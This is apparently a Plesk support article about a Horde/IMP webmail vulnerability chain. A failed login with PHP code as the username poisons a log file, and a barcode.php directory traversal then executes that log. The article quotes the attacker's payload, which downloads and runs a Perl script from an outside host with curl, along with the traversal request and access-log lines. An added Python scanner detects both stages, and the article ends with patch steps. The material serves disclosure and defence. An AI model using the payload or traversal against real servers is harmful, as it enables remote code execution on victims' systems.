Horde/IMP Plesk Webmail Exploit

Article ID: 113374, created on Feb 26, 2012, last review on Aug 12, 2014

APPLIES TO:
  • Plesk 9.3 for Linux/Unix
  • Plesk 9.2 for Linux/Unix
  • Plesk 9.0 for Linux/Unix
  • Plesk 8.6 for Linux/Unix
  • Plesk 9.3 for Windows
  • Plesk 9.2 for Windows
  • Plesk 9.0 for Windows
  • Plesk 8.6 for Windows

Symptoms

The Horde/IMP package (3.1.7-3.3.2) shipped with Plesk 8.x and with 9.x versions before 9.5.4 has a vulnerability that allows an attacker to run malicious software: the attacker submits a login to the webmail as a POST request to the /horde/imp/redirect.php file, using PHP code as the username. For example:
 
<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>

 
The failed login causes the PHP code to be written to the /var/log/psa-horde/psa-horde.log file. A second vulnerability in the barcode.php file (its type parameter is not checked for directory traversal) then allows the attacker to make Horde include and execute that log file with this request:
 
/horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log

 
Here is what the attacker's actual requests (the first two lines, from the web server access log) and the resulting entry in the psa-horde.log file (the third line) look like:
 
66.240.226.25 - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
66.240.226.25 - - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 13160 "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
Jan 17 08:01:35 HORDE [error] [imp] FAILED LOGIN 66.240.226.25 to localhost:143[imap/notls] as <?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>@casanh.org [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
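As an added example (not part of the Plesk article), the following Python scanner flags both stages of this attack in logs: the access-log request to barcode.php whose type parameter walks out of its directory or carries a NUL byte, and the psa-horde.log FAILED LOGIN entry whose username contains a PHP open tag. The sample lines are constructed from the entries quoted above; example.com and the phpinfo() payload are substitutions, and the request regex tolerates the missing HTTP method seen in the article's second line.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the article's entries: two web-server
# access-log lines (the second with the missing method exactly as quoted),
# one benign barcode request, then two psa-horde.log lines.
ACCESS_LOG = [
    '66.240.226.25 - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '66.240.226.25 - - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 13160 "1" "Mozilla/5.0"',
    '10.0.0.7 - - [17/Jan/2012:09:00:00 -0500] "GET /horde/util/barcode.php?type=code128&text=12345 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
HORDE_LOG = [
    'Jan 17 08:01:35 HORDE [error] [imp] FAILED LOGIN 66.240.226.25 to localhost:143[imap/notls] as <?php phpinfo(); ?>@example.com [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]',
    'Jan 17 08:05:10 HORDE [error] [imp] FAILED LOGIN 10.0.0.7 to localhost:143[imap/notls] as alice@example.com [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]',
]

# Common/combined log format: client IP, timestamp, then "METHOD PATH PROTO".
# The method group is optional so a line with a blank method still parses.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S*) ?(\S+) [^"]*"')
# psa-horde.log: "FAILED LOGIN <ip> to <server> as <username> [on line ..."
FAILED_LOGIN_RE = re.compile(r'FAILED LOGIN (\S+) to \S+ as (.*?) \[on line')

def barcode_traversal_hits(lines):
    """Return (client_ip, decoded type value) for barcode.php requests whose
    type parameter contains a '../' traversal or a NUL byte after decoding."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, _method, path = m.groups()
        if not path.startswith('/horde/util/barcode.php?'):
            continue
        for param in path.split('?', 1)[1].split('&'):
            key, _, value = param.partition('=')
            decoded = unquote(value)  # %00 becomes a real NUL byte
            if key == 'type' and ('../' in decoded or '\x00' in decoded):
                hits.append((ip, decoded))
    return hits

def php_in_username_hits(lines):
    """Return (client_ip, username) for FAILED LOGIN entries whose username
    carries a PHP open tag, i.e. the log-poisoning step of the attack."""
    hits = []
    for line in lines:
        m = FAILED_LOGIN_RE.search(line)
        if m and re.search(r'<\?(php|=)', m.group(2), re.IGNORECASE):
            hits.append((m.group(1), m.group(2)))
    return hits

if __name__ == '__main__':
    print(barcode_traversal_hits(ACCESS_LOG))
    print(php_in_username_hits(HORDE_LOG))
```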

Resolution

Download the patch for Horde 3.1.7-3.3.2 that matches the platform your server runs on, unzip it, and place the file in the corresponding folder:

Linux:
/usr/share/psa-horde/lib/Horde/  - [ patch ]

Windows:
%plesk_vhosts%\webmail\horde\lib\Horde\ - [ patch ]


Attachments:
